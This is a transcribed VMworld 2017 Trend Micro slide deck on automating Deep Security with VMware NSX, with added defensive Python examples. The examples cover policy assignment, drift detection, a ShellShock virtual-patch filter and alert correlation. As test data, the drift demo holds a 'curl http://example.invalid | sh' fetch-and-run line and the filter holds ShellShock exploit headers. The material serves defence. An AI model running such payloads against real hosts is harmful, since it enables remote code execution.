SAI3314BES Automated Security for the Real-time Enterprise with VMware NSX and Trend Micro Deep Security Chris Van Den Abbeele, Global Solution Architect, Trend Micro #VMworld #SAI3314BES
Automated Security for the Real-time Enterprise with VMware NSX and Trend Micro Deep Security Chris Van Den Abbeele, Global Solution Architect, Trend Micro VMworld 2017 Also meet us on Wednesday 11am Hall 8.0, Room 25 for [SAI3316BES] Skip the Security Slow Lane With VMware on AWS Content: Not for publication
Agenda
- Who is Trend Micro?
- Automated security: from bolted on to part of the fabric
- The business case for automated virtual patching
- Integration with vRealize Operations
Trend Micro: 28 years focused on security software. Headquartered in Japan and listed on the Tokyo Stock Exchange, Nikkei Index (4704). Annual sales over US$1B. Customers include 45 of the top 50 global corporations. 5500+ employees in over 50 countries. 500k commercial customers and 155M endpoints protected, across the consumer, small business, midsize business and enterprise segments.
Integrated security: from bolted on to part of the fabric
What's the problem with bolted-on security? With the introduction of workload virtualization we made a quantum leap in Operations, and the same is now happening with network virtualization. In many cases, however, Security remained stuck in the Dark Ages: it is still something that is applied manually, afterwards. In today's real-time enterprise the Operations team has to do more with less, every day, and creates more new workloads than ever before. Manually adding the security controls takes a lot of time, so it is often postponed (and, finally, forgotten). We need to shift security left and integrate it into the automation.
You can't protect what you don't see. The lifecycle used in the rest of this talk: Visibility, Context, Risk assessment, Protect, Maintain.
Visibility. Many security dashboards only show workloads that have already been brought under the control of the security solution (i.e. that have a security agent installed). Can you still see the trees in the forest? How can you detect shadow IT?
Can you see VMs that were created by the Operations team in vCenter, vCloud Director (VCD), vCloud Air, AWS, Azure or Active Directory, automatically, without running a scan, and even if those VMs are not yet protected?
Can you still see the trees in the forest? Can you organize your VMs in a structure that makes sense from a security perspective, rather than one imposed by the underlying operations tooling?
Context (lifecycle step 2: Visibility, Context, Risk assessment, Protect, Maintain)
Security is all about context. Can you tell if you are looking at a web server or a database server? Is it Internet-facing or inside the datacenter? Is it a server or a workstation VM? Does it hold marketing flyers, or is it a finance system? Is it a Windows server, some Linux server, a Docker host, a SAP system, ...?
Estimate the risk (lifecycle step 3: Visibility, Context, Risk assessment, Protect, Maintain)
Estimate the risk. Which OS (version, patch level, ...) is this? Which applications are running on this system? Which OS vulnerabilities exist on it? Which application vulnerabilities? Can you automate a scan for vulnerabilities? How would you know which policies to apply?
Some high-risk vulnerabilities
Automatically apply the right security controls (lifecycle step 4: Visibility, Context, Risk assessment, Protect, Maintain)
Event-based tasks to profile new systems
The same exploits... now protected by Deep Security
Rich API set, to integrate with virtually any orchestration and automation tool and/or scripting language (PowerShell, for example).
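The event-based profiling and the API integration from the last few slides, as an added example in Python (not code from the deck or from Trend Micro): the decision logic maps what a connector already knows about a new VM to a policy name, and the request builder shows the shape of a policy-assignment call. The endpoint path `/api/computers/{id}`, the `api-secret-key` and `api-version` headers and the `policyID` field are assumptions based on my recollection of the Deep Security Manager v1 REST API; `Workload`, `POLICY_RULES` and the policy names are hypothetical. Check all of them against your manager's API reference before use.

```python
"""Event-based profiling of a newly discovered workload (added example).

Decision logic (offline, testable) is kept apart from the API call. The
REST endpoint, header names and JSON field below are ASSUMPTIONS about the
Deep Security Manager v1 API; verify against your manager's API reference.
"""
import json
import re
import ssl
import urllib.request
from dataclasses import dataclass, field


@dataclass
class Workload:
    """Context a connector (vCenter, AWS, ...) already knows about a VM (hypothetical shape)."""
    host_name: str
    platform: str                                # e.g. "Windows Server 2016", "Ubuntu Linux 16.04"
    listening_ports: set = field(default_factory=set)
    tags: dict = field(default_factory=dict)     # e.g. {"tier": "web", "zone": "dmz"}


# Illustrative rules, evaluated top to bottom; first match wins. Policy names are
# placeholders: map them to the policy IDs that exist in your own manager.
POLICY_RULES = [
    (lambda w: w.tags.get("zone") == "dmz" and w.listening_ports & {80, 443},
     "Internet-facing web server"),
    (lambda w: w.listening_ports & {1433, 3306, 5432, 1521},
     "Database server"),
    (lambda w: "sap" in w.tags.get("app", "").lower(),
     "SAP NetWeaver"),
    (lambda w: re.search(r"windows", w.platform, re.I) and "server" not in w.platform.lower(),
     "Workstation"),
    (lambda w: re.search(r"windows", w.platform, re.I),
     "Windows base server"),
    (lambda w: re.search(r"linux|red hat|ubuntu|centos|suse", w.platform, re.I),
     "Linux base server"),
]


def choose_policy(workload: Workload, fallback: str = "Quarantine - unknown workload") -> str:
    """Pick the first matching policy; an unrecognised system gets a restrictive fallback,
    never 'no policy', so an unprofiled VM is not left unprotected."""
    for predicate, policy in POLICY_RULES:
        if predicate(workload):
            return policy
    return fallback


def build_assign_request(base_url: str, api_key: str, computer_id: int,
                         policy_id: int) -> urllib.request.Request:
    """Build the POST that assigns a policy to a computer (endpoint shape is an assumption)."""
    body = json.dumps({"policyID": policy_id}).encode()
    return urllib.request.Request(
        url=f"{base_url.rstrip('/')}/api/computers/{computer_id}",
        data=body,
        method="POST",
        headers={
            "api-secret-key": api_key,        # assumed header name
            "api-version": "v1",              # assumed header name/value
            "Content-Type": "application/json",
        },
    )


def assign_policy(req: urllib.request.Request, ca_file: str) -> dict:
    """Send the request, trusting only the manager's own CA (never disable verification)."""
    ctx = ssl.create_default_context(cafile=ca_file)
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Constructed 'new VM' event as a connector might report it.
    new_vm = Workload("web01", "Ubuntu Linux 16.04", {22, 443}, {"zone": "dmz"})
    print(new_vm.host_name, "->", choose_policy(new_vm))
    req = build_assign_request("https://dsm.example.internal:4119", "<api-key>", 7, 3)
    print(req.get_method(), req.full_url)
```

The point of the fallback policy is that profiling can fail silently; a VM the rules do not recognise should land in the most restrictive policy and raise a ticket, not stay unassigned.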
Multi-layered security for the hybrid cloud
- Network security (stop network attacks, shield vulnerable applications and servers): Intrusion Prevention, Firewall, Vulnerability Scanning
- System security (lock down systems and detect suspicious activity): Application Control, Integrity Monitoring, Log Inspection
- Malware prevention (stop malware and targeted attacks): Anti-Malware, Behavioral Analysis and Machine Learning, Sandbox Analysis
Full, multi-layered security: 8 layers of security
- Anti-Malware
- Web Reputation
- Firewall
- Intrusion Prevention
- Integrity Monitoring
- Log Inspection
- Application Control
- Protection for SAP systems (NW-VSI)
Make sure the systems remain protected (lifecycle step 5: Visibility, Context, Risk assessment, Protect, Maintain)
Protect against drift. Integrity Monitoring: monitor sensitive files and sensitive registry keys for changes. Application Control: freeze the server's approved software inventory and block new executables and scripts from running.
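What the two drift controls do at file level, as an added Python example that is not Deep Security code: a SHA-256 baseline of a directory is compared against a later snapshot (integrity monitoring), and executables whose hash is not in a frozen allow-list are reported as blocked (application control). The directory, files and tampering in `demo()` are constructed.

```python
"""Drift detection on a directory (added example, not Deep Security code).

Integrity monitoring = baseline hashes vs. a later snapshot.
Application control = executables outside a frozen allow-list are blocked.
"""
import hashlib
import stat
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict:
    """Hash every regular file under root; keys are paths relative to root."""
    return {
        str(p.relative_to(root)): sha256_of(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and not p.is_symlink()
    }


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Added, removed and modified files; any non-empty list is drift to alert on."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


def is_executable(path: Path) -> bool:
    return path.is_file() and bool(path.stat().st_mode & stat.S_IXUSR)


def application_control(root: Path, allow_list: set) -> dict:
    """Lock-down check: an executable whose hash is not in the allow-list would be blocked.
    Matching on hash (not path) means replacing an allowed binary in place is also caught."""
    verdict = {}
    for p in sorted(root.rglob("*")):
        if is_executable(p):
            verdict[str(p.relative_to(root))] = "allow" if sha256_of(p) in allow_list else "block"
    return verdict


def demo() -> tuple:
    """Constructed scenario: take a baseline, tamper with the host, re-scan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "etc" / "sshd_config").write_text("PermitRootLogin no\n")
        tool = root / "backup.sh"
        tool.write_text("#!/bin/sh\necho backup\n")
        tool.chmod(0o755)
        baseline = snapshot(root)
        allowed = {sha256_of(tool)}          # the approved executable set is frozen here

        # Tampering: a hardening setting is weakened and a new script is dropped.
        (root / "etc" / "sshd_config").write_text("PermitRootLogin yes\n")
        dropper = root / "miner.sh"
        dropper.write_text("#!/bin/sh\ncurl http://example.invalid | sh\n")
        dropper.chmod(0o755)

        drift = diff_snapshots(baseline, snapshot(root))
        verdicts = application_control(root, allowed)
    return drift, verdicts


if __name__ == "__main__":
    drift, verdicts = demo()
    print("drift:", drift)
    print("application control:", verdicts)
```

In a real deployment the baseline and allow-list must live somewhere the monitored host cannot rewrite them, otherwise an attacker with root simply re-baselines after tampering.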
Protect against the latest vulnerabilities: scheduled vulnerability scans
Securing business transformation: Deep Security
The business case for automated virtual patching
Typical patch cycle without virtual patching: monthly security patching plus half-yearly full patching, i.e. 12 patching rounds per year.
High-impact zero days require immediate attention. Are we vulnerable (what is the risk)? Who can provide a patch? When can we have the patch? When can we test it? Who can test it (which team)? Where can we test it (test environment)? When can we have a maintenance window to patch and reboot our servers?
Typical patch cycle with virtual patching: automated, ongoing security patching (virtual patches applied by the IPS layer) plus half-yearly full patching, i.e. 2 patching rounds per year.
Win-win: increases security and reduces cost
5 days after ShellShock: 766 attacks blocked (customer example). 766 attacks were blocked by Deep Security automated virtual patching on Sept 30th at a customer managing 100+ instances. If emergency (physical) patching takes 5 days...
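What an automated virtual patch actually does on the wire, as an added Python example (not a Deep Security IPS rule): an HTTP request filter that blocks the ShellShock (CVE-2014-6271) trigger pattern `() {` in any header or query value before it reaches an unpatched bash-backed CGI script. The sample requests are constructed.

```python
"""A virtual patch for ShellShock, as a request filter (added example).

The exploit places a bash function definition "() { ... };" in any value the
web server exports into the CGI environment (User-Agent, Referer, Cookie, a
query parameter); vulnerable bash executes whatever follows the closing
brace. Blocking that pattern in transit protects the host until it is patched.
"""
import re
from urllib.parse import parse_qsl, urlsplit

SHELLSHOCK = re.compile(r"\(\s*\)\s*\{")   # "() {" with optional whitespace


def parse_request(raw: str) -> dict:
    """Minimal parser for a raw HTTP/1.x request head; the body is passed through untouched."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    query = dict(parse_qsl(urlsplit(target).query))   # percent-decoded, so %7B is seen as "{"
    return {"method": method, "target": target, "headers": headers, "query": query, "body": body}


def inspect_request(raw: str) -> dict:
    """Verdict plus the field that matched, so the block is attributable in the event log."""
    req = parse_request(raw)
    for field, value in list(req["headers"].items()) + list(req["query"].items()):
        if SHELLSHOCK.search(value):
            return {"action": "block", "field": field, "rule": "CVE-2014-6271"}
    return {"action": "allow", "field": None, "rule": None}


# Constructed sample traffic.
BENIGN = (
    "GET /cgi-bin/status.sh?site=main HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)
ATTACK_HEADER = (
    "GET /cgi-bin/status.sh HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: () { :;}; /bin/bash -c 'id'\r\n\r\n"
)
ATTACK_QUERY = (  # same payload, percent-encoded in a query parameter
    "GET /cgi-bin/status.sh?site=()%20%7B%20:%3B%7D%3B%20id HTTP/1.1\r\n"
    "Host: www.example.com\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("header", ATTACK_HEADER), ("query", ATTACK_QUERY)):
        print(name, inspect_request(raw))
```

Note what this does and does not buy you: the host is still vulnerable, so the rule must stay active until the real patch lands, and a production rule has to decode every place the server exports request data into the environment (including vendor-specific headers), not just the two shown here.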
Integration with vRealize Operations
Isolated worlds... A user calls because a VM is slow to respond, or an administrator receives a security alert.
- Virtual infrastructure administrator: log ticket; log in to vRealize Operations; attempt to vMotion, reboot or recycle the VM; close ticket; root cause analysis.
- Security administrator: log ticket; log in to Deep Security Manager; change rules to block specific ports, quarantine and scan; close ticket; root cause analysis.
Single pane of glass for Trend Micro events and VMware events
Correlate vROps events with security events
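The correlation the previous slides describe, as an added Python example that is not vRealize Operations or Deep Security code: two constructed event streams (performance alerts keyed by VM name, security events keyed by host name) are joined on the VM and a look-back window, so a "VM slow to respond" ticket is tied to what the agent saw just before it. The field names and the ten-minute window are assumptions.

```python
"""Joining operations alerts with security events (added example).

Both streams are constructed samples; field names are assumptions, not the
schema of vRealize Operations or Deep Security.
"""
from datetime import datetime, timedelta

OPS_EVENTS = [  # what the infrastructure administrator sees
    {"time": "2017-09-12T09:02:10", "vm": "web01", "alert": "CPU usage at 97% for 5 minutes"},
    {"time": "2017-09-12T09:40:00", "vm": "db01", "alert": "Datastore latency high"},
]
SECURITY_EVENTS = [  # what the security administrator sees
    {"time": "2017-09-12T08:59:30", "host": "web01", "module": "IPS",
     "event": "ShellShock attempt blocked", "action": "Reset"},
    {"time": "2017-09-12T09:00:05", "host": "web01", "module": "Anti-Malware",
     "event": "Coin miner detected", "action": "Quarantined"},
    {"time": "2017-09-12T07:10:00", "host": "web01", "module": "Log Inspection",
     "event": "Multiple failed SSH logins", "action": "Logged"},
]


def parse_time(s: str) -> datetime:
    return datetime.fromisoformat(s)


def correlate(ops_events: list, security_events: list,
              window: timedelta = timedelta(minutes=10)) -> list:
    """For each ops alert, attach security events on the same VM that occurred
    within `window` before the alert (cause precedes symptom)."""
    result = []
    for ops in ops_events:
        t = parse_time(ops["time"])
        related = [
            s for s in security_events
            if s["host"] == ops["vm"] and timedelta(0) <= t - parse_time(s["time"]) <= window
        ]
        result.append({"ops": ops, "security": sorted(related, key=lambda s: s["time"])})
    return result


def summarize(correlated: list) -> list:
    """One line per ops alert, suitable for a shared dashboard or ticket note."""
    lines = []
    for item in correlated:
        ops = item["ops"]
        if item["security"]:
            causes = "; ".join(f'{s["module"]}: {s["event"]} ({s["action"]})' for s in item["security"])
            lines.append(f'{ops["vm"]}: "{ops["alert"]}" preceded by {causes}')
        else:
            lines.append(f'{ops["vm"]}: "{ops["alert"]}" has no security event in window')
    return lines


if __name__ == "__main__":
    for line in summarize(correlate(OPS_EVENTS, SECURITY_EVENTS)):
        print(line)
```

The join key matters more than the window: the VM name in the operations tool and the host name the agent reports are often not identical (FQDN vs. display name), so in practice you normalise both to the VM's UUID from the connector before correlating.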
Customer references
Deep Security on VMware NSX. See customer success stories: Join Experience, Emirates NBD, Integra Networks, Telecom Italia, University of Pittsburgh. Please visit TrendMicro.com/customers. "Deep Security extends the benefits of NSX micro-segmentation with security policies and capabilities that automatically follow virtual machines no matter where they go."
Summary
Ongoing automated holistic protection
- Visibility: connectors and Smart Folders across physical, virtual, cloud and containers give a clear line of sight from one console
- Context: rich data on the workload; event-based tasks to profile new systems
- Risk assessment: recommendation scan for high-risk vulnerabilities; APIs
- Protect: eight layers of security and threat-protection capabilities
- Maintain: automated virtual patching, Application Control and integration with vRealize Operations
Summary. Hopefully this presentation has provided a few insights and practical examples on how to bring your hybrid cloud security into the 21st century. By automating and integrating security into the operations stack, you can greatly improve your security posture and reduce operational costs. Do the same setup and demo yourself in the VMworld Hands-on Labs: LAB HOL-1841.